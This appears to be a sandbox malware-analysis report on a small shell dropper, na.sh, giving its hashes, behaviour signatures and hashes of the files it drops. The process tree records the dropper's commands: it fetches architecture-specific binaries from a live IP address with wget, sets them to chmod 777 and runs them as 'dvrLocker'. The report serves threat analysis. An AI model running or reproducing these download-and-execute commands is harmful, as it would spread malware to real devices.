Overview

overview

7

Static

static

1

na.sh

ubuntu-18.04-amd64

7

na.sh

debian-9-armhf

7

na.sh

debian-9-mips

7

na.sh

debian-9-mipsel

7

Analysis

  • max time kernel
    149s
  • max time network
    164s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    10-10-2024 07:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    na.sh

  • Size

    372B

  • MD5

    6b2644c0adca68c54a53a79842eb3b3c

  • SHA1

    d26ec0f0fc70fcb713aba5fa56912809cefb8bc0

  • SHA256

    89e3309d765c4f00090a446b6599b23a3d2334aec380f52cb7d9c89da2683e6f

  • SHA512

    943667c0ddec5ed4ec3a8d66d8997078a9b04f3b48b937f5e3b339f039d53c495a27a3253c504edc22704c394bb197455ace2e1c45e17eeda806b3b4200fb90c

Score
7/10
credential_accessdefense_evasiondiscovery

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Deletes itself 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads process memory 1 TTPs 4 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

    credential_access
  • Changes its process name 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 1 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/na.sh
    /tmp/na.sh
    1⤵
    • Writes file to tmp directory
    PID:643
    • /bin/rm
      rm -rf dvrLocker
      2⤵
        PID:645
      • /usr/bin/wget
        wget http://185.157.247.125/c/empsl -O -
        2⤵
          PID:647
        • /bin/chmod
          chmod 777 dvrLocker
          2⤵
          • File and Directory Permissions Modification
          PID:665
        • /dvrLocker
          ./dvrLocker tplink.new
          2⤵
          • Executes dropped EXE
          PID:666
        • /usr/bin/wget
          wget http://185.157.247.125/c/emips -O -
          2⤵
          • System Network Configuration Discovery
          PID:669
        • /bin/chmod
          chmod 777 dvrLocker
          2⤵
          • File and Directory Permissions Modification
          PID:676
        • /dvrLocker
          ./dvrLocker tplink.new
          2⤵
          • Executes dropped EXE
          PID:677
        • /usr/bin/wget
          wget http://185.157.247.125/c/earm -O -
          2⤵
            PID:679
          • /bin/chmod
            chmod 777 dvrLocker
            2⤵
            • File and Directory Permissions Modification
            PID:681
          • /dvrLocker
            ./dvrLocker tplink.new
            2⤵
            • Deletes itself
            • Executes dropped EXE
            • Reads process memory
            • Changes its process name
            • Reads runtime system information
            PID:682
          • /usr/bin/wget
            wget http://185.157.247.125/c/earm7 -O -
            2⤵
              PID:684
            • /bin/chmod
              chmod 777 dvrLocker
              2⤵
              • File and Directory Permissions Modification
              PID:686
            • /dvrLocker
              ./dvrLocker tplink.new
              2⤵
              • Executes dropped EXE
              PID:692
            • /bin/sh
              /bin/sh ./dvrLocker tplink.new
              2⤵
                PID:692
              • /usr/bin/wget
                wget http://185.157.247.125/c/ex86 -O -
                2⤵
                  PID:695
                • /bin/chmod
                  chmod 777 dvrLocker
                  2⤵
                  • File and Directory Permissions Modification
                  PID:697
                • /dvrLocker
                  ./dvrLocker tplink.new
                  2⤵
                  • Executes dropped EXE
                  PID:702
                • /bin/sh
                  /bin/sh ./dvrLocker tplink.new
                  2⤵
                    PID:702

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /dvrLocker
                  Filesize

                  27KB

                  MD5

                  300cd530fb0a7f7cf6db875f68c0483e

                  SHA1

                  a4bce294dc142fb1354e917bed4d58c98f381850

                  SHA256

                  a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885

                  SHA512

                  656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1

                  Download Submit

                • /dvrLocker
                  Filesize

                  41KB

                  MD5

                  3cfc76868e26201ac03e0583b7c8aaba

                  SHA1

                  03436d9d090e1f944fecf60adc1e45f90df20c26

                  SHA256

                  8c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d

                  SHA512

                  84add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2

                  Download Submit

                • /dvrLocker
                  Filesize

                  40KB

                  MD5

                  c0b34d8a59f793b636b5424b8e96a64a

                  SHA1

                  d5eac6c7b3a5953ffcd642de9db2cd1c45463e96

                  SHA256

                  defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270

                  SHA512

                  57446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4

                  Download Submit